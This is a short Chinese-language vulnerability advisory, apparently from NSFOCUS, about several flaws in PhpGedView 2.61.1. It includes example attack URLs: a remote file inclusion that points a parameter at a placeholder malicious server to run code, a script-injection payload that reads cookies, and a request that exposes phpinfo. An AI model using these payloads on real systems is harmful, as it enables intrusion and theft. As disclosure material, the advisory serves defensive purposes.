首页 -> 安全研究

安全研究

安全漏洞
PhpGedView多个安全漏洞

发布日期:2004-01-07
更新日期:2004-01-09

受影响系统:
PhpGedView PhpGedView 2.61.1
描述:
PhpGedView用于解析GEDCOM 5.5系谱文件及能把它们以类似桌面程序的格式显示在Internet上。

PhpGedView存在多个安全漏洞,远程攻击者可以利用这个漏洞以WEB进程权限执行任意命令,或获得系统敏感信息。

具体问题如下:

1、"functions.php", "authentication_index.php", 和"config_gedcom.php"脚本对外部提供的"$PGV_BASE_DIRECTORY"参数缺少充分检查,提交包含远程服务器上的恶意文件可导致以WEB进程权限在系统上执行任意命令。如:

http://[victim]/functions.php?PGV_BASE_DIRECTORY=http://[malicious_server]/

2、"search.php"脚本对"firstname"缺少充分过滤,可导致进行跨站脚本执行攻击,可能获得目标用户敏感信息。如:

http://[victim]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>

3、如果没有在安装后删除"editconfig.php", 通过这个脚本可重安装和更改管理员密码。

4、在"admin.php"脚本中提供"action"参数字符串"phpinfo",可泄露各种系统信息。如

http://[victim]/admin.php?action=phpinfo

<*来源:Windak, Vietnamese Security Group.
  
  链接:http://www.secunia.com/advisories/10565/
*>

建议:
厂商补丁:

PhpGedView
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://phpgedview.sourceforge.net/

浏览次数:3323
严重程度:1(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障